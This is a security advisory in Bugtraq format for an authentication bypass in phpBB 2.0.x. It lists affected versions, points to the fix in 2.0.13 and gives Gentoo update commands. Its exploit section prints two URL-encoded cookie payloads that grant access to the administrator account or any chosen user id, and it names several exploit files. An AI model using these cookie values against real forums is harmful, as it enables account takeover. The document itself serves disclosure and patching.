PHPBB Authentication Bypass Vulnerability

Bugtraq ID:	12678
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	Feb 28 2005 12:00AM
Updated:	Feb 28 2005 12:00AM
Credit:	Discovery of this vulnerability is credited to Heintz <www.waraxe.us>.
Vulnerable:	phpBB Group phpBB 2.0.12 phpBB Group phpBB 2.0.11 phpBB Group phpBB 2.0.10 phpBB Group phpBB 2.0.9 phpBB Group phpBB 2.0.8 a phpBB Group phpBB 2.0.8 phpBB Group phpBB 2.0.7 a phpBB Group phpBB 2.0.7 phpBB Group phpBB 2.0.6 d phpBB Group phpBB 2.0.6 c phpBB Group phpBB 2.0.6 phpBB Group phpBB 2.0.5 phpBB Group phpBB 2.0.4 phpBB Group phpBB 2.0.3 phpBB Group phpBB 2.0.2 phpBB Group phpBB 2.0.1 phpBB Group phpBB 2.0 .0 phpBB Group phpBB 2.0 RC4 - Apache Software Foundation Apache 1.3.9 - Apache Software Foundation Apache 1.3.9 phpBB Group phpBB 2.0 RC3 - Apache Software Foundation Apache 1.3.9 - Apache Software Foundation Apache 1.3.9 phpBB Group phpBB 2.0 RC2 - Apache Software Foundation Apache 1.3.9 - Apache Software Foundation Apache 1.3.9 phpBB Group phpBB 2.0 RC1 - Apache Software Foundation Apache 1.3.9 - Apache Software Foundation Apache 1.3.9 phpBB Group phpBB 2.0 Beta 1 - Apache Software Foundation Apache 1.3.9 - Apache Software Foundation Apache 1.3.9 Gentoo Linux
Not Vulnerable:	phpBB Group phpBB 2.0.13 + Debian Linux 3.1 sparc + Debian Linux 3.1 s/390 + Debian Linux 3.1 ppc + Debian Linux 3.1 mipsel + Debian Linux 3.1 mips + Debian Linux 3.1 m68k + Debian Linux 3.1 ia-64 + Debian Linux 3.1 ia-32 + Debian Linux 3.1 hppa + Debian Linux 3.1 arm + Debian Linux 3.1 alpha + Debian Linux 3.1

PHPBB Authentication Bypass Vulnerability

phpBB is affected by an authentication bypass vulnerability.

This issue is due to the application failing to properly sanitize user-supplied input during authentication.

Exploitation of this vulnerability would permit unauthorized access to any known account including the administrator account.

The vendor has addressed this issue in phpBB 2.0.13.

PHPBB Authentication Bypass Vulnerability

An exploit is not required.

The following proof of concept demonstrating cookie values necessary to authenticate to the numerical id '2' account, typically the administrator account, is available:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

The following proof of concept was supplied by Dim K0r0l <[email protected]>:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A4%3A%22[id]%22%3B%7D

Paisterist has provided an exploit; an additional exploit is made available by phuket (phpBBphuket.pl), and overdose <[email protected]> (phpbbexp.cpp). It should be noted that the integrity of 'phpbbexp.cpp' has not been verified by Symantec:

• /data/vulnerabilities/exploits/phpbbsession.c
• /data/vulnerabilities/exploits/phpBBphuket.pl
• /data/vulnerabilities/exploits/phpbbexp.cpp

PHPBB Authentication Bypass Vulnerability

Solution:
The vendor has addressed this issue in phpBB 2.0.13.

Gentoo has released advisory GLSA 200503-02 to address various issues in phpBB. Please see the referenced advisory for more information. Gentoo users may carry out the following commands to update their computers:

emerge --sync
emerge --ask --oneshot --verbose ">=www-apps/phpBB-2.0.13"


phpBB Group phpBB 2.0 RC1

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0 RC3

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0 RC4

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0 Beta 1

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0 RC2

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0 .0

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0.1

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0.10

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0.11

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0.12

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0.2

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0.3

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0.4

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0.5

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0.6

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0.6 c

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0.6 d

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0.7

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0.7 a

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0.8 a

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0.8

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

phpBB Group phpBB 2.0.9

• phpBB Group phpBB 2.0.13
  http://www.phpbb.com/downloads.php

PHPBB Authentication Bypass Vulnerability

References:

• phpBB 2.0.13 released - Critical Update (phpBB)
  
• phpBB 2.0.12 Session Handling Administrator Authentication Bypass -SIMPLIFIED- (Wesley aka PPC )
  
• phpBB 2.0.12 Session Handling Administrator Authentication Bypass Exploit (phuket )
  
• phpbb cookie admin access (pureone )